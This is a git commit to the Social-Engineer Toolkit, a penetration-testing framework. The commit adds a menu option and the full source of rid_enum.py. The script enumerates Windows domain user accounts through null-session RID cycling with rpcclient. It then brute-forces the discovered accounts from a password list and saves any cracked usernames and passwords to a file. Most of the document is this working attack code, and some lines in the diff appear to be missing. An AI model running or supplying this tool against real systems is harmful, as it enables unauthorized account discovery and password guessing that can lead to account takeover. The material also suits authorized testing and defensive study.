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synced 2025-02-17 13:58:34 +00:00
Added rid_enum to SET - rid cycling attack
This commit is contained in:
7 changed files with 293 additions and 5 deletions
@ -9,10 +9,10 @@
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set_config.py generated: 2013-03-15 11:13:36.564372 #
# set_config.py generated: 2013-03-16 12:14:25.755490 #
# #
CONFIG_DATE='2013-03-15 11:13:36.564372'
CONFIG_DATE='2013-03-16 12:14:25.755490'
@ -1,3 +1,9 @@
version 4.7.1
* added rid_enum into the fasttrack menu - no modifications needed to the file itself and built into SET logic (will always maintain most recent git version)
version 4.7
@ -229,6 +229,7 @@ def category(category):
@ -289,6 +289,61 @@ try:
# load drac menu
subprocess.Popen("python %s/src/fasttrack/delldrac.py" % (definepath), shell=True).wait()
if attack_vector == "5":
print (""".______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
print "\nRID_ENUM is a tool that will enumerate user accounts through a rid cycling attack through null sessions. In\norder for this to work, the remote server will need to have null sessions enabled. In most cases, you would use\nthis against a domain controller on an internal penetration test. You do not need to provide credentials, it will\nattempt to enumerate the base RID address and then cycle through 500 (Administrator) to whatever RID you want."
print "\n"
ipaddr = raw_input(setprompt(["31"], "Enter the IP address of server (or quit to exit)"))
if ipaddr == "99" or ipaddr == "quit" or ipaddr == "exit":
print_status("Next you can automatically brute force the user accounts. If you do not want to brute force, type no at the next prompt")
dict = raw_input(setprompt(["31"], "Enter path to dictionary file to brute force [enter for built in]"))
# if we are using the built in one
if dict == "":
# write out a file
filewrite = file("src/program_junk/dictionary.txt", "w")
# specify the path
dict = "src/program_junk/dictionary.txt"
# if we are not brute forcing
if dict.lower() == "no":
print_status("No problem, not brute forcing user accounts")
dict = ""
if dict != "":
print_warning("You are about to brute force user accounts, be careful for lockouts.")
choice = raw_input(setprompt(["31"], "Are you sure you want to brute force [yes/no]"))
if choice.lower() == "n" or choice.lower() == "no":
print_status("Okay. Not brute forcing user accounts *phew*.")
dict = ""
# next we see what rid we want to start
start_rid = raw_input(setprompt(["31"], "What RID do you want to start at [500]"))
if start_rid == "": start_rid = "500"
# stop rid
stop_rid = raw_input(setprompt(["31"], "What RID do you want to stop at [15000]"))
if stop_rid == "": stop_rid = "15000"
print_status("Launching RID_ENUM to start enumerating user accounts...")
subprocess.Popen("python src/fasttrack/rid_enum.py %s %s %s %s" % (ipaddr,start_rid,stop_rid,dict), shell=True).wait()
# once we are finished, prompt.
print_status("Everything is finished!")
pause = raw_input("Press {return} to go back to the main menu.)
# handle keyboard exceptions
except KeyboardInterrupt:
@ -70,6 +70,7 @@ fasttrack_menu = ['Microsoft SQL Bruter',
'Custom Exploits',
'SCCM Attack Vector',
'Dell DRAC/Chassis Default Checker',
'RID_ENUM - User Enumeration Attack',
fasttrack_text = ("""
@ -221,7 +221,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '4.7'
define_version = '4.7.1'
return define_version
class create_menu:
@ -843,7 +843,7 @@ def show_banner(define_version,graphic):
print bcolors.BLUE + """
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Headshot""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
Executable file
Executable file
@ -0,0 +1,225 @@
import subprocess
import os
import sys
# RID Enum v0.2
# RID Cycling Tool
# Written by: David Kennedy (ReL1K)
# Website: https://www.trustedsec.com
# Twitter: @TrustedSec
# Twitter: @dave_rel1k
# This tool will use rpcclient to cycle through and identify what rid accounts exist. Uses a few
# different techniques to find the proper RID.
# attempt to use lsa query furst
def check_user_lsa(ip):
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % (ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# if the user wasnt found, return a False
if not "Domain Sid" in stdout_value:
return False
return stdout_value
# attempt to lookup an account via rpcclient
def check_user(ip, account):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip,account), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# if the user wasnt found, return a False
if "NT_STATUS_NONE_MAPPED" in stdout_value:
return False
return stdout_value
# this will do a conversion to find the account name based on rid
def sid_to_name(ip, sid, rid):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupsids %s-%s"' % (ip, sid,rid), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if not "*unknown*" in stdout_value:
stdout_value = stdout_value.split(" ")
# will show during an unhandled request
if stdout_value[1] != "request":
return stdout_value[1]
# capture initial input
success = ""
ip = sys.argv[1]
rid_start = sys.argv[2]
rid_stop = sys.argv[3]
# if password file was specified
passwords = ""
# pull in password file
passwords = sys.argv[4]
# if its not there then bomb out
if not os.path.isfile(passwords):
print "[!] File was not found. Please try a path again."
except IndexError:
# check for python pexpect
import pexpect
# if we dont have it
except ImportError:
print "[!] Sorry boss, python-pexpect is not installed. You need to install this first."
print "[*] Attempting lsaquery first...This will enumerate the base domain SID"
# call the check_user_lsa function and check to see if we can find base SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid != False:
if sid != "":
print "[*] Successfully enumerated base domain SID.. Moving on to extract via RID"
# format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
# if we weren't successful on lsaquery
if sid == False:
print "[!] Unable to enumerate through lsaquery, trying default account names.."
accounts = ("administrator", "guest", "krbtgt")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if sid == False:
print "[!] Failed using account name: %s...Attempting another." % (account)
if sid != "":
# success! Break out of the loop
print "[*] Successfully enumerated SID account.. Moving on to extract via RID.\n"
print "[!] Failed. Access is denied. Sorry boss."
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# we has no sids :( exiting
if sid == False:
print "[!] Unable to enumerate user accounts, sorry..Must not be vulnerable."
print "[*] Enumerating user accounts.. This could take a little while."
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
# this is where we write out our output
if os.path.isfile("%s_users.txt" % (ip)):
# remove old file
os.remove("%s_users.txt" % (ip))
filewrite = file("%s_users.txt" % (ip), "a")
# cycle through rid and enumerate the domain
while rid_start != rid_stop:
sidname = sid_to_name(ip, sid, rid_start)
if sidname != None:
# print the sid
print "Account name: " + sidname
# write the file out
filewrite.write(sidname + "\n")
# increase rid until we hit our rid_stop
rid_start = rid_start + 1
# close the file
print "[*] Finished enumerating user accounts... Seemed to be successful."
# if we specified a password list
if passwords != "":
# our password file
passfile = file(passwords, "r").readlines()
# our list of users
userfile = file("%s_users.txt" % (ip), "r").readlines()
# cycle through a password list
for password in passfile:
# strip unused characters
password = password.rstrip()
for user in userfile:
# strip unused characters
user = user.rstrip()
# insert additional backslash for rpcclient compliance
user_fixed = user.replace("\\", "\\\\")
# brute force, single quotes in names mess things up
if not "'" in user:
child = pexpect.spawn("rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient'])
if i == 0:
print "Failed guessing username of %s and password of %s" % (user, password)
if i == 1:
print "[*] Successfully guessed username: %s with password of: %s" % (user, password)
success = success + "username: %s password: %s\n" % (user, password)
# if we weren't successful
if success == "":
print "\n[!] Unable to brute force a user account, sorry boss."
# if we got lucky
filewrite = file("%s_success_results.txt" % (ip), "w")
print "[*] We got some accounts, exported results to %s_success_results.txt" % (ip)
print "[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % (ip)
# exit out after we are finished
# except keyboard interrupt
except KeyboardInterrupt:
print "[*] Okay, Okay... Exiting... Thanks for using rid_enum.py"
# except indexerror
except IndexError, e:
print """
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
Written by: David Kennedy (ReL1K)
Version: 0.2
Company: https://www.trustedsec.com
Twitter: @TrustedSec
Twitter: @Dave_ReL1K
Rid Enum is a RID cycling attack that attempts to enumerate user accounts through
null sessions and the SID to RID enum. If you specify a password file, it will
automatically attempt to brute force the user accounts when its finished enumerating.
- RID_ENUM is open source and uses all standard python libraries minus python-pexpect. -
Example: ./rid_enum.py 500 50000 /root/dict.txt
Usage: ./rid_enum.py <server_ip> <start_rid> <end_rid> <optional_password_file>
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